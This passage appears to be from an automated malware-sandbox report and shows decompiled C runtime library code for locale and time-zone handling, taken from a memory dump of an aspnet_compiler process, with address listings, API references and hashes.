					_v508 = _t428;
					__eflags = _t249;
					if(_t249 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t359 = 0;
						_v452 = 0;
						__eflags = _t444;
						if(__eflags == 0) {
							L79:
							E004435FC(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
							goto L80;
						} else {
							__eflags =  *_t444 - 0x4c;
							if( *_t444 != 0x4c) {
								L58:
								_push(0);
								_t255 = E004431C4(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
								_t474 = _t472 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t370 = 0;
									__eflags = 0;
									_t76 = _t428 + 0x20; // 0x442deb
									_t421 = _t76;
									_t446 = 0;
									_v452 = _t421;
									do {
										__eflags = _t446;
										if(_t446 == 0) {
											L73:
											_t256 = _v456;
										} else {
											_t374 =  *_t421;
											_t257 =  &_v276;
											while(1) {
												__eflags =  *_t257 -  *_t374;
												_t428 = _v464;
												if( *_t257 !=  *_t374) {
													break;
												}
												__eflags =  *_t257;
												if( *_t257 == 0) {
													L66:
													_t370 = 0;
													_t258 = 0;
												} else {
													_t422 =  *((intOrPtr*)(_t257 + 2));
													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
													_v458 = _t422;
													_t421 = _v452;
													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
														break;
													} else {
														_t257 = _t257 + 4;
														_t374 = _t374 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t258;
												if(_t258 == 0) {
													_t359 = _t359 + 1;
													__eflags = _t359;
													goto L73;
												} else {
													_t259 =  &_v276;
													_push(_t259);
													_push(_t446);
													_push(_t428);
													L83();
													_t421 = _v452;
													_t474 = _t474 + 0xc;
													__eflags = _t259;
													if(_t259 == 0) {
														_t370 = 0;
														_t256 = 0;
														_v456 = 0;
													} else {
														_t359 = _t359 + 1;
														_t370 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t258 = _t257 | 0x00000001;
											_t370 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t446 = _t446 + 1;
										_t421 = _t421 + 0x10;
										_v452 = _t421;
										__eflags = _t446 - 5;
									} while (_t446 <= 5);
									__eflags = _t256;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t359;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t444 + 2) - 0x43;
								if( *(_t444 + 2) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
									if( *((short*)(_t444 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t261 = E0044F967(_t444, 0x45b568);
											_t361 = _t261;
											_v472 = _t361;
											_pop(_t376);
											__eflags = _t361;
											if(_t361 == 0) {
												break;
											}
											_t263 = _t261 - _t444;
											__eflags = _t263;
											_v456 = _t263 >> 1;
											if(_t263 == 0) {
												break;
											} else {
												_t265 = 0x3b;
												__eflags =  *_t361 - _t265;
												if( *_t361 == _t265) {
													break;
												} else {
													_t431 = _v456;
													_t362 = 0x45b42c;
													_v460 = 1;
													do {
														_t266 = E0044F92D( *_t362, _t444, _t431);
														_t472 = _t472 + 0xc;
														__eflags = _t266;
														if(_t266 != 0) {
															goto L45;
														} else {
															_t377 =  *_t362;
															_t420 = _t377 + 2;
															do {
																_t334 =  *_t377;
																_t377 = _t377 + 2;
																__eflags = _t334 - _v468;
															} while (_t334 != _v468);
															_t376 = _t377 - _t420 >> 1;
															__eflags = _t431 - _t377 - _t420 >> 1;
															if(_t431 != _t377 - _t420 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t362 = _t362 + 0xc;
														__eflags = _t362 - 0x45b45c;
													} while (_t362 <= 0x45b45c);
													_t359 = _v472 + 2;
													_t267 = E0044F8DD(_t376, _t359, ";");
													_t428 = _v464;
													_t447 = _t267;
													_pop(_t380);
													__eflags = _t447;
													if(_t447 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t268 = _v452;
															goto L54;
														} else {
															_push(_t447);
															_t270 = E0044E949(_t380,  &_v276, 0x83, _t359);
															_t475 = _t472 + 0x10;
															__eflags = _t270;
															if(_t270 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E0043A5E8();
																asm("int3");
																_push(_t463);
																_t465 = _t475;
																_t273 =  *0x46f00c; // 0xd60a1515
																_v556 = _t273 ^ _t465;
																_push(_t359);
																_t364 = _v540;
																_push(_t447);
																_push(_t428);
																_t432 = _v544;
																_v1292 = _t364;
																_v1276 = E00446A95(_t364, _t380, _t420) + 0x278;
																_push( &_v1256);
																_t280 = E004431C4(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t477 = _t475 - 0x2e4 + 0x18;
																__eflags = _t280;
																if(_t280 != 0) {
																	_t101 = _t364 + 2; // 0x6
																	_t450 = _t101 << 4;
																	__eflags = _t450;
																	_t281 =  &_v280;
																	_v724 = _t450;
																	_t381 =  *((intOrPtr*)(_t450 + _t432));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t281 -  *_t381;
																		_t452 = _v724;
																		if( *_t281 !=  *_t381) {
																			break;
																		}
																		__eflags =  *_t281;
																		if( *_t281 == 0) {
																			L91:
																			_t282 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t281 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
																			_v718 = _t459;
																			_t452 = _v724;
																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
																				break;
																			} else {
																				_t281 = _t281 + 4;
																				_t381 = _t381 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t282;
																		if(_t282 != 0) {
																			_t382 =  &_v280;
																			_t424 = _t382 + 2;
																			do {
																				_t283 =  *_t382;
																				_t382 = _t382 + 2;
																				__eflags = _t283 - _v712;
																			} while (_t283 != _v712);
																			_v728 = (_t382 - _t424 >> 1) + 1;
																			_t286 = E00444A38(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
																			_v740 = _t286;
																			__eflags = _t286;
																			if(_t286 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t452 + _t432));
																				_t125 = _t364 * 4; // 0xcea3
																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
																				_t128 = _t432 + 8; // 0x8b56ff8b
																				_v748 =  *_t128;
																				_t391 =  &_v280;
																				_v720 = _t286 + 4;
																				_t290 = E004463E1(_t286 + 4, _v728,  &_v280);
																				_t479 = _t477 + 0xc;
																				__eflags = _t290;
																				if(_t290 != 0) {
																					_t291 = _v712;
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					E0043A5E8();
																					asm("int3");
																					_t293 =  *0x470518; // 0x0
																					return _t293;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t296 = E00442ED1(_t364, _t391, _t432,  &_v708);
																						_t393 = _v712;
																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t393 = _v712;
																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
																						}
																					}
																					__eflags = _t364 - 2;
																					if(_t364 != 2) {
																						__eflags = _t364 - 1;
																						if(_t364 != 1) {
																							__eflags = _t364 - 5;
																							if(_t364 == 5) {
																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
																						}
																					} else {
																						_t457 = _v736;
																						_t425 = _t393;
																						_t403 = _t457;
																						 *(_t432 + 8) = _v716;
																						_v720 = _t457;
																						_v728 = _t457[8];
																						_v716 = _t457[9];
																						while(1) {
																							_t154 = _t432 + 8; // 0x8b56ff8b
																							__eflags =  *_t154 -  *_t403;
																							if( *_t154 ==  *_t403) {
																								break;
																							}
																							_t458 = _v720;
																							_t425 = _t425 + 1;
																							_t328 =  *_t403;
																							 *_t458 = _v728;
																							_v716 = _t403[1];
																							_t403 = _t458 + 8;
																							 *((intOrPtr*)(_t458 + 4)) = _v716;
																							_t364 = _v752;
																							_t457 = _v736;
																							_v728 = _t328;
																							_v720 = _t403;
																							__eflags = _t425 - 5;
																							if(_t425 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t425 - 5;
																							if(__eflags == 0) {
																								_t178 = _t432 + 8; // 0x8b56ff8b
																								_t319 = E0044F9AC(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x45b4e8, 0x7f,  &_v536,  *_t178, 1);
																								_t479 = _t479 + 0x1c;
																								__eflags = _t319;
																								_t320 = _v712;
																								if(_t319 == 0) {
																									_t457[1] = _t320;
																								} else {
																									do {
																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t323 = E004358BA( &_v536,  *0x46f170, 0xfe);
																									_t479 = _t479 + 0xc;
																									__eflags = _t323;
																									_t457[1] = 0 | _t323 == 0x00000000;
																								}
																								_t193 = _t432 + 8; // 0x8b56ff8b
																								 *_t457 =  *_t193;
																							}
																							 *(_t432 + 0x18) = _t457[1];
																							goto L121;
																						}
																						__eflags = _t425;
																						if(_t425 != 0) {
																							 *_t457 =  *(_t457 + _t425 * 8);
																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
																							 *(_t457 + _t425 * 8) = _v728;
																							 *(_t457 + 4 + _t425 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					_t297 = _t364 * 0xc;
																					_t200 = _t297 + 0x45b428; // 0x40f943
																					 *0x4574c8(_t432);
																					_t299 =  *((intOrPtr*)( *_t200))();
																					_t396 = _v732;
																					__eflags = _t299;
																					if(_t299 == 0) {
																						__eflags = _t396 - 0x46f2a8;
																						if(_t396 != 0x46f2a8) {
																							_t456 = _t364 + _t364;
																							__eflags = _t456;
																							asm("lock xadd [eax], ecx");
																							if(_t456 != 0) {
																								goto L126;
																							} else {
																								_t218 = _t456 * 8; // 0x30ff068b
																								E00445002( *((intOrPtr*)(_t432 + _t218 + 0x28)));
																								_t221 = _t456 * 8; // 0x30ff0c46
																								E00445002( *((intOrPtr*)(_t432 + _t221 + 0x24)));
																								_t224 = _t364 * 4; // 0xcea3
																								E00445002( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
																								_t399 = _v712;
																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
																							}
																						}
																						_t397 = _v740;
																						 *_t397 = 1;
																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
																					} else {
																						 *(_v724 + _t432) = _t396;
																						_t205 = _t364 * 4; // 0xcea3
																						E00445002( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
																						E00445002(_v740);
																						 *(_t432 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			goto L85;
																		}
																		goto L130;
																	}
																	asm("sbb eax, eax");
																	_t282 = _t281 | 0x00000001;
																	__eflags = _t282;
																	goto L93;
																} else {
																	L84:
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t465;
																	return E004338BB(_v16 ^ _t465);
																}
															} else {
																_t330 = _t447 + _t447;
																__eflags = _t330 - 0x106;
																if(_t330 >= 0x106) {
																	E004339EF();
																	goto L82;
																} else {
																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
																	_t332 =  &_v276;
																	_push(_t332);
																	_push(_v460);
																	_push(_t428);
																	L83();
																	_t472 = _t475 + 0xc;
																	__eflags = _t332;
																	_t268 = _v452;
																	if(_t332 != 0) {
																		_t268 = _t268 + 1;
																		_v452 = _t268;
																	}
																	L54:
																	_t444 = _t359 + _t447 * 2;
																	_t370 = 0;
																	__eflags =  *_t444;
																	if( *_t444 == 0) {
																		L56:
																		__eflags = _t268;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																		}
																		goto L80;
																	} else {
																		_t444 = _t444 + 2;
																		__eflags =  *_t444;
																		if( *_t444 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t333 = 0x3b;
														__eflags =  *_t359 - _t333;
														if( *_t359 != _t333) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L130;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t444;
						if(_t444 != 0) {
							_push(_t444);
							_push(_t249);
							_push(_t428);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t463;
						return E004338BB(_v12 ^ _t463);
					}
				}
				L130:
			}






































































































































                0x004435fc
                0x004435ff
                0x00443601
                0x00443604
                0x00443605
                0x0044360e
                0x00443616
                0x00443618
                0x0044361a
                0x0044361d
                0x00443736
                0x0044373b
                0x00443623
                0x00443623
                0x00443624
                0x00443624
                0x00443627
                0x0044362a
                0x0044362c
                0x0044362f
                0x0044362f
                0x00443632
                0x00443634
                0x00443637
                0x0044363c
                0x0044364a
                0x00443654
                0x00443657
                0x0044365a
                0x0044365a
                0x00443665
                0x0044366a
                0x0044366f
                0x00000000
                0x00443675
                0x00443678
                0x00443678
                0x0044367b
                0x0044367d
                0x00443680
                0x00443680
                0x00443680
                0x00443682
                0x00443682
                0x00443682
                0x00443688
                0x00000000
                0x00000000
                0x0044368d
                0x004436a4
                0x004436a4
                0x0044368f
                0x0044368f
                0x00443697
                0x00000000
                0x00443699
                0x00443699
                0x0044369c
                0x004436a2
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004436a2
                0x00443697
                0x004436ad
                0x004436b2
                0x004436b4
                0x004436b9
                0x004436bc
                0x004436bf
                0x004436c2
                0x004436c5
                0x004436c7
                0x004436cc
                0x004436d6
                0x004436de
                0x004436e6
                0x00000000
                0x004436ec
                0x004436f0
                0x0044373d
                0x00443743
                0x00443746
                0x00443749
                0x0044374b
                0x0044374f
                0x00443753
                0x00443755
                0x00443758
                0x0044375d
                0x00443753
                0x0044375e
                0x00443761
                0x00443763
                0x00443765
                0x00443769
                0x0044376a
                0x0044376c
                0x0044376f
                0x00443774
                0x0044376a
                0x00443777
                0x0044377a
                0x0044377d
                0x00443780
                0x00443783
                0x00443783
                0x004436f2
                0x004436f2
                0x004436f5
                0x004436f8
                0x004436fa
                0x004436fe
                0x00443702
                0x00443704
                0x00443707
                0x0044370c
                0x00443702
                0x0044370d
                0x00443712
                0x00443714
                0x00443719
                0x0044371b
                0x0044371e
                0x00443723
                0x00443719
                0x00443724
                0x00443728
                0x00443728
                0x0044372b
                0x0044372f
                0x00443732
                0x00443732
                0x00000000
                0x00443735
                0x00000000
                0x004436e6
                0x004436a8
                0x004436aa
                0x004436aa
                0x00000000
                0x004436aa
                0x0044378a
                0x0044378b
                0x0044378c
                0x0044378d
                0x0044378e
                0x0044378f
                0x00443794
                0x00443797
                0x00443798
                0x0044379a
                0x004437a0
                0x004437a7
                0x004437aa
                0x004437ad
                0x004437ae
                0x004437af
                0x004437b2
                0x004437b3
                0x004437b6
                0x004437bc
                0x004437be
                0x004437e3
                0x004437ed
                0x004437f3
                0x004437f5
                0x004437fb
                0x004437fd
                0x00443a50
                0x00443a51
                0x00000000
                0x00443803
                0x00443803
                0x00443807
                0x0044396e
                0x0044396e
                0x00443985
                0x0044398a
                0x0044398d
                0x0044398f
                0x00443995
                0x00443995
                0x00443997
                0x00443997
                0x0044399a
                0x0044399c
                0x004439a2
                0x004439a2
                0x004439a4
                0x00443a2b
                0x00443a2b
                0x004439aa
                0x004439aa
                0x004439ac
                0x004439b2
                0x004439b5
                0x004439b8
                0x004439be
                0x00000000
                0x00000000
                0x004439c0
                0x004439c4
                0x004439ed
                0x004439ed
                0x004439ef
                0x004439c6
                0x004439c6
                0x004439ca
                0x004439ce
                0x004439d5
                0x004439db
                0x00000000
                0x004439dd
                0x004439dd
                0x004439e0
                0x004439e3
                0x004439eb
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004439eb
                0x004439db
                0x004439fa
                0x004439fa
                0x004439fc
                0x00443a2a
                0x00443a2a
                0x00000000
                0x004439fe
                0x004439fe
                0x00443a04
                0x00443a05
                0x00443a06
                0x00443a07
                0x00443a0c
                0x00443a12
                0x00443a15
                0x00443a17
                0x00443a1e
                0x00443a20
                0x00443a22
                0x00443a19
                0x00443a19
                0x00443a1a
                0x00000000
                0x00443a1a
                0x00443a17
                0x00000000
                0x004439fc
                0x004439f3
                0x004439f5
                0x004439f8
                0x004439f8
                0x00000000
                0x004439f8
                0x00443a31
                0x00443a31
                0x00443a32
                0x00443a35
                0x00443a3b
                0x00443a3b
                0x00443a44
                0x00443a46
                0x00000000
                0x00443a48
                0x00443a48
                0x00000000
                0x00443a48
                0x00443a46
                0x00000000
                0x0044380d
                0x0044380d
                0x00443812
                0x00000000
                0x00443818
                0x00443818
                0x0044381d
                0x00000000
                0x00443823
                0x00443823
                0x00443829
                0x0044382e
                0x00443830
                0x00443837
                0x00443838
                0x0044383a
                0x00000000
                0x00000000
                0x00443840
                0x00443840
                0x00443844
                0x0044384a
                0x00000000
                0x00443850
                0x00443852
                0x00443853
                0x00443856
                0x00000000
                0x0044385c
                0x0044385c
                0x00443862
                0x00443867
                0x00443871
                0x00443875
                0x0044387a
                0x0044387d
                0x0044387f
                0x00000000
                0x00443881
                0x00443881
                0x00443883
                0x00443886
                0x00443886
                0x00443889
                0x0044388c
                0x0044388c
                0x00443897
                0x00443899
                0x0044389b
                0x00000000
                0x00000000
                0x0044389b
                0x00000000
                0x0044389d
                0x0044389d
                0x004438a3
                0x004438a6
                0x004438a6
                0x004438b4
                0x004438bd
                0x004438c2
                0x004438c8
                0x004438cb
                0x004438cc
                0x004438ce
                0x004438dc
                0x004438dc
                0x004438e3
                0x00443944
                0x00000000
                0x004438e5
                0x004438e5
                0x004438f3
                0x004438f8
                0x004438fb
                0x004438fd
                0x00443a6d
                0x00443a6f
                0x00443a70
                0x00443a71
                0x00443a72
                0x00443a73
                0x00443a74
                0x00443a79
                0x00443a7c
                0x00443a7d
                0x00443a85
                0x00443a8c
                0x00443a8f
                0x00443a90
                0x00443a93
                0x00443a97
                0x00443a98
                0x00443a9b
                0x00443aab
                0x00443ab7
                0x00443ace
                0x00443ad3
                0x00443ad6
                0x00443ad8
                0x00443aed
                0x00443af0
                0x00443af0
                0x00443af3
                0x00443af9
                0x00443b02
                0x00443b04
                0x00443b07
                0x00443b0e
                0x00443b11
                0x00443b17
                0x00000000
                0x00000000
                0x00443b19
                0x00443b1d
                0x00443b46
                0x00443b46
                0x00443b1f
                0x00443b1f
                0x00443b23
                0x00443b27
                0x00443b2e
                0x00443b34
                0x00000000
                0x00443b36
                0x00443b36
                0x00443b39
                0x00443b3c
                0x00443b44
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00443b44
                0x00443b34
                0x00443b53
                0x00443b53
                0x00443b55
                0x00443b5b
                0x00443b61
                0x00443b64
                0x00443b64
                0x00443b67
                0x00443b6a
                0x00443b6a
                0x00443b7a
                0x00443b88
                0x00443b8d
                0x00443b94
                0x00443b96
                0x00000000
                0x00443b9c
                0x00443ba2
                0x00443ba8
                0x00443baf
                0x00443bb5
                0x00443bb8
                0x00443bbe
                0x00443bcb
                0x00443bd2
                0x00443bd7
                0x00443bda
                0x00443bdc
                0x00443e35
                0x00443e3b
                0x00443e3c
                0x00443e3d
                0x00443e3e
                0x00443e3f
                0x00443e40
                0x00443e45
                0x00443e46
                0x00443e4b
                0x00443be2
                0x00443be2
                0x00443bf0
                0x00443bf3
                0x00443c0e
                0x00443c15
                0x00443c1b
                0x00443c21
                0x00443bf5
                0x00443bf5
                0x00443bfd
                0x00000000
                0x00443bff
                0x00443bff
                0x00443c05
                0x00443c05
                0x00443bfd
                0x00443c28
                0x00443c2b
                0x00443d48
                0x00443d4b
                0x00443d58
                0x00443d5b
                0x00443d63
                0x00443d63
                0x00443d4d
                0x00443d53
                0x00443d53
                0x00443c31
                0x00443c31
                0x00443c37
                0x00443c3f
                0x00443c41
                0x00443c44
                0x00443c4d
                0x00443c56
                0x00443c5c
                0x00443c5c
                0x00443c5f
                0x00443c61
                0x00000000
                0x00000000
                0x00443c63
                0x00443c69
                0x00443c6a
                0x00443c75
                0x00443c7d
                0x00443c85
                0x00443c88
                0x00443c8b
                0x00443c91
                0x00443c97
                0x00443c9d
                0x00443ca3
                0x00443ca6
                0x00000000
                0x00000000
                0x00443ca8
                0x00443ccd
                0x00443ccd
                0x00443cd0
                0x00443cd4
                0x00443ced
                0x00443cf2
                0x00443cf5
                0x00443cf7
                0x00443cfd
                0x00443d38
                0x00443cff
                0x00443cff
                0x00443d04
                0x00443d0c
                0x00443d0d
                0x00443d0d
                0x00443d24
                0x00443d2b
                0x00443d2e
                0x00443d33
                0x00443d33
                0x00443d3b
                0x00443d3e
                0x00443d3e
                0x00443d43
                0x00000000
                0x00443d43
                0x00443caa
                0x00443cac
                0x00443cb1
                0x00443cb7
                0x00443cc0
                0x00443cc9
                0x00443cc9
                0x00000000
                0x00443cac
                0x00443d66
                0x00443d66
                0x00443d6a
                0x00443d72
                0x00443d78
                0x00443d7b
                0x00443d81
                0x00443d83
                0x00443dc3
                0x00443dc9
                0x00443dd0
                0x00443dd0
                0x00443dd6
                0x00443dda
                0x00000000
                0x00443ddc
                0x00443ddc
                0x00443de0
                0x00443de5
                0x00443de9
                0x00443dee
                0x00443df5
                0x00443e03
                0x00443e09
                0x00443e0c
                0x00443e0c
                0x00443dda
                0x00443e1b
                0x00443e23
                0x00443e2c
                0x00443d85
                0x00443d8b
                0x00443d8e
                0x00443d95
                0x00443da7
                0x00443dae
                0x00443dbb
                0x00000000
                0x00443dbb
                0x00000000
                0x00443d83
                0x00443bdc
                0x00443b57
                0x00000000
                0x00443b57
                0x00000000
                0x00443b55
                0x00443b4e
                0x00443b50
                0x00443b50
                0x00000000
                0x00443ada
                0x00443ada
                0x00443ada
                0x00443adc
                0x00443ae1
                0x00443aec
                0x00443aec
                0x00443903
                0x00443903
                0x00443906
                0x0044390b
                0x00443a68
                0x00000000
                0x00443911
                0x00443913
                0x0044391b
                0x00443921
                0x00443922
                0x00443928
                0x00443929
                0x0044392e
                0x00443931
                0x00443933
                0x00443939
                0x0044393b
                0x0044393c
                0x0044393c
                0x0044394a
                0x0044394a
                0x0044394d
                0x0044394f
                0x00443952
                0x00443960
                0x00443960
                0x00443a4a
                0x00443a4a
                0x00000000
                0x00443a4c
                0x00443a4c
                0x00000000
                0x00443954
                0x00443954
                0x00443957
                0x0044395a
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044395a
                0x00443952
                0x0044390b
                0x004438fd
                0x004438d0
                0x004438d2
                0x004438d3
                0x004438d6
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004438d6
                0x004438ce
                0x00443856
                0x00000000
                0x0044384a
                0x00000000
                0x00443967
                0x0044381d
                0x00443812
                0x00443807
                0x004437c0
                0x004437c0
                0x004437c2
                0x004437c4
                0x004437c5
                0x004437c6
                0x004437c7
                0x004437cc
                0x00443a57
                0x00443a5c
                0x00443a67
                0x00443a67
                0x004437be
                0x00000000

                APIs
                  • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                • _free.LIBCMT ref: 00443707
                • _free.LIBCMT ref: 0044371E
                • _free.LIBCMT ref: 0044373D
                • _free.LIBCMT ref: 00443758
                • _free.LIBCMT ref: 0044376F
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$AllocateHeap
                • String ID:
                • API String ID: 3033488037-0
                • Opcode ID: b6cc103d42dec73caba0faed39fcbb1d6259d76fbcf985581e3157810f6f44a6
                • Instruction ID: 33fd527e9c34fc99befeee23a18cff77bba5ae58738d28a8d8759c9d181ac574
                • Opcode Fuzzy Hash: b6cc103d42dec73caba0faed39fcbb1d6259d76fbcf985581e3157810f6f44a6
                • Instruction Fuzzy Hash: 1F51F6B1A00705AFEB20DF2AC841A6AB7F4EF45B25F14416FE849D7351E739DA01CB88
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00447BE5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 69%
                			E00447BE5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				int _t93;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t88 = __edi;
				_t96 = E0044764F();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E004476AD( &_v8);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043A5E8();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x46f00c; // 0xd60a1515
					_v56 = _t38 ^ _t106;
					 *0x46f344 =  *0x46f344 | 0xffffffff;
					 *0x46f338 =  *0x46f338 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t77 = "TZ";
					_t89 = 0;
					 *0x470758 = 0;
					_t42 = E0043A9B5(__eflags,  &_v316,  &_v312, 0x100, "TZ");
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E00444A38(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E0043A9B5(__eflags,  &_v276, _t101, _v272, _t77);
								__eflags = _t50;
								if(_t50 == 0) {
									E00445002(0);
									_t89 = _t101;
								} else {
									_push(_t101);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								E00445002();
							}
						}
					} else {
						_t89 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t89 -  &_v268) & _t89;
					__eflags = _t89;
					if(__eflags == 0) {
						L33:
						E00447BE5(_t77, _t89, _t100, __eflags);
					} else {
						__eflags =  *_t89;
						if(__eflags == 0) {
							goto L33;
						} else {
							_push(_t89);
							E00447A10(_t77, _t89, _t100, __eflags);
						}
					}
					E00445002(_t100);
					__eflags = _v12 ^ _t106;
					return E004338BB(_v12 ^ _t106);
				} else {
					_t54 = E00447655( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E00447681( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E00445002( *0x470750);
							 *0x470750 = 0;
							 *_t107 = 0x470760;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x470760 * 0x3c;
								_t87 =  *0x4707b4; // 0x0
								_push(__edi);
								 *0x470758 = 1;
								_v8 = _t85;
								_t116 =  *0x4707a6; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t87 * 0x3c;
								}
								_t118 =  *0x4707fa; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x470808; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t87) * 0x3c;
									}
								}
								_t93 = E00444607(0, _t87);
								if(WideCharToMultiByte(_t93, 0, 0x470764, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t93, 0, 0x4707b8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E00447649()) = _v8;
							 *(E0044763D()) = _v12;
							_t61 = E00447643();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}


































                0x00447be5
                0x00447bf4
                0x00447bfb
                0x00447bff
                0x00447c02
                0x00447c05
                0x00447c0a
                0x00447c0d
                0x00447d35
                0x00447d35
                0x00447d36
                0x00447d37
                0x00447d38
                0x00447d39
                0x00447d3a
                0x00447d3f
                0x00447d43
                0x00447d4b
                0x00447d52
                0x00447d55
                0x00447d62
                0x00447d69
                0x00447d6a
                0x00447d6c
                0x00447d71
                0x00447d80
                0x00447d87
                0x00447d8f
                0x00447d91
                0x00447d9b
                0x00447d9e
                0x00447dab
                0x00447dae
                0x00447db0
                0x00447dc9
                0x00447dd1
                0x00447dd3
                0x00447dd9
                0x00447dde
                0x00447dd5
                0x00447dd5
                0x00000000
                0x00447dd5
                0x00447db2
                0x00447db2
                0x00447db3
